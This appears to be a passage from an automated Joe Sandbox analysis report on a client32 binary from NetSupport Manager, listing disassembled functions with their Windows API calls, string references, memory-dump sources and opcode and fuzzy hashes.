                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                    • API String ID: 468487828-934300333
                                                                                                                                                    • Opcode ID: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                                                                                                    • Instruction ID: f0241db128611486ad2bba77008837faff31f6141376dc95c8c97f83293769ff
                                                                                                                                                    • Opcode Fuzzy Hash: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                                                                                                    • Instruction Fuzzy Hash: 09F0EC3EE9063573D25211772C4AF8FB6844B8569DF540032FD26BA740EE14A40147B9
                                                                                                                                                    Function 11003480 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadMenuA.USER32(00000000,00002EF1), ref: 1100348D
                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 110034B3
                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 110034E2
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                    • API String ID: 468487828-934300333
                                                                                                                                                    • Opcode ID: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
                                                                                                                                                    • Instruction ID: f340f484bb22d03bd5e0d621a808cbfa0eacb2cd0322e49d7d14e933c66e57f7
                                                                                                                                                    • Opcode Fuzzy Hash: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
                                                                                                                                                    • Instruction Fuzzy Hash: 63F0EC3EF9063573D25321772C0AF8FB5844B8569DF550032FD26BEA40EE14B40146B9
                                                                                                                                                    Function 11027580 Relevance: 9.1, APIs: 6, Instructions: 70threadwindowsleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostThreadMessageA.USER32(00000000,00000501,1102DB60,00000000), ref: 110275D2
                                                                                                                                                    • Sleep.KERNEL32(00000032,?,1102DB60,00000001), ref: 110275D6
                                                                                                                                                    • PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 110275F7
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000032,?,1102DB60,00000001), ref: 11027602
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00002710,?,1102DB60,00000001), ref: 11027614
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,00000000,00002710,?,1102DB60,00000001), ref: 11027641
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePostThread$CloseFreeHandleLibraryObjectSingleSleepWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2375713580-0
                                                                                                                                                    • Opcode ID: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                                                                                                    • Instruction ID: 5d0aa2bc238e72ac38ea6d9656cf733a88b5b02fa80378034871cbc9b64e3e84
                                                                                                                                                    • Opcode Fuzzy Hash: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                                                                                                    • Instruction Fuzzy Hash: B1217C71A43735DBE612CBD8CCC4A76FBA8AB58B18B40013AF524C7288C770A441CF91
                                                                                                                                                    Function 1113D790 Relevance: 9.0, APIs: 6, Instructions: 49synchronizationthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11040BBA,00000000), ref: 1113D7C5
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,1113D660,00000000,00000000,00000000), ref: 1113D7E0
                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D805
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00001388,?,?,11040BBA,00000000), ref: 1113D816
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D829
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D83C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateEventHandle$ObjectSingleThreadWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 414154005-0
                                                                                                                                                    • Opcode ID: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
                                                                                                                                                    • Instruction ID: 02350ad9304c652d5973a468123ac0969e3fb67a745117c4f7e49a1723ee0a3b
                                                                                                                                                    • Opcode Fuzzy Hash: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
                                                                                                                                                    • Instruction Fuzzy Hash: 9F11CE705C8265AAF7298BE5C9A8B95FFA4934631DF50402AF2389658CCBB02088CB54
                                                                                                                                                    Function 111715A2 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __getptd.LIBCMT ref: 111715AE
                                                                                                                                                      • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                                                                                      • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                                                                                                    • __amsg_exit.LIBCMT ref: 111715CE
                                                                                                                                                    • __lock.LIBCMT ref: 111715DE
                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 111715FB
                                                                                                                                                    • _free.LIBCMT ref: 1117160E
                                                                                                                                                    • InterlockedIncrement.KERNEL32(02E616D0), ref: 11171626
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3470314060-0
                                                                                                                                                    • Opcode ID: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
                                                                                                                                                    • Instruction ID: 224c65a35f2b569fe2d6e63dca2a733826a481c10535b45dbfb9364d9a312d7f
                                                                                                                                                    • Opcode Fuzzy Hash: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
                                                                                                                                                    • Instruction Fuzzy Hash: 3001C4369027229BEB029FA9858479DF761AB0271CF490015E820A7B84CB70A992DFD6
                                                                                                                                                    Function 110B3560 Relevance: 9.0, APIs: 6, Instructions: 42synchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetEvent.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3578
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B3585
                                                                                                                                                    • CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3598
                                                                                                                                                    • CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35A5
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35C3
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B35D0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle$EventObjectSingleWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2857295742-0
                                                                                                                                                    • Opcode ID: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
                                                                                                                                                    • Instruction ID: c91d849fc108652eb31eb37091e5d5d4b5a552e1f27565d093635cb0be7e85a1
                                                                                                                                                    • Opcode Fuzzy Hash: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
                                                                                                                                                    • Instruction Fuzzy Hash: 96011A75A087049BD7909FB988D4A96F7DCEB54300F11492EE5AEC3200CB78B8448F60
                                                                                                                                                    Function 11095990 Relevance: 9.0, APIs: 6, Instructions: 38COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 1109599E
                                                                                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 110959A7
                                                                                                                                                    • GetSystemMetrics.USER32(0000004E), ref: 110959AE
                                                                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 110959B7
                                                                                                                                                    • GetSystemMetrics.USER32(0000004F), ref: 110959BD
                                                                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 110959C5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4116985748-0
                                                                                                                                                    • Opcode ID: 2acc5d47520048a17b19bc27345c05a5b6d72aca177766317273f5998d5a9f83
                                                                                                                                                    • Instruction ID: b65ab4a361e5326c91c4d36ade1d631f08c7cf5d252a1eb012e320adc1ee70d1
                                                                                                                                                    • Opcode Fuzzy Hash: 2acc5d47520048a17b19bc27345c05a5b6d72aca177766317273f5998d5a9f83
                                                                                                                                                    • Instruction Fuzzy Hash: 01F030B1B4131A6BE7009FAADC41B55BB98EB48664F008037A71C87680D6B5A8108FE4
                                                                                                                                                    Function 1103B606 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 198COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0000045F,00000000,?,00000000), ref: 1103B75F
                                                                                                                                                      • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
                                                                                                                                                      • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                                                                                      • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                                                                                      • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                                                                                                    • GetWindowTextA.USER32(?,?,000000C8), ref: 1103B81E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateCurrentDialogErrorFileLastModuleNameParamTextThreadWindowwsprintf
                                                                                                                                                    • String ID: Survey$pcicl32.dll$toastImageAndText.png
                                                                                                                                                    • API String ID: 2477883239-2305317391
                                                                                                                                                    • Opcode ID: 20d55293dd5fa1f4e889e7781169e96fca4c20f63d10528dafaeeb9acde81bac
                                                                                                                                                    • Instruction ID: a37ee32854b15c041e991ad0c80392c526a8d8f631297bf945f8db0117e793ba
                                                                                                                                                    • Opcode Fuzzy Hash: 20d55293dd5fa1f4e889e7781169e96fca4c20f63d10528dafaeeb9acde81bac
                                                                                                                                                    • Instruction Fuzzy Hash: 3871E27590465A9FE709CF64C8D8FEAB7F5EB48308F1485A9D5198B381EB30E944CB50
                                                                                                                                                    Function 110773B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 110773FB
                                                                                                                                                      • Part of subcall function 11076740: DeferWindowPos.USER32(8B000EB5,00000000,BEE85BC0,33CD335E,?,00000000,33CD335E,11077496), ref: 11076783
                                                                                                                                                    • EqualRect.USER32(?,?), ref: 1107740C
                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,?,33CD335E,BEE85BC0,8B000EB5,00000014,?,?,?,?,?,110775EA,00000000,?), ref: 11077466
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 11077447
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077442
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$DeferEqualPointsRect
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 2754115966-2830328467
                                                                                                                                                    • Opcode ID: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                                                                                                    • Instruction ID: 7762f9a6a2ed7d341f2943c2e7d232384b1531e6a197bbc7c1a3da1ffe608ad4
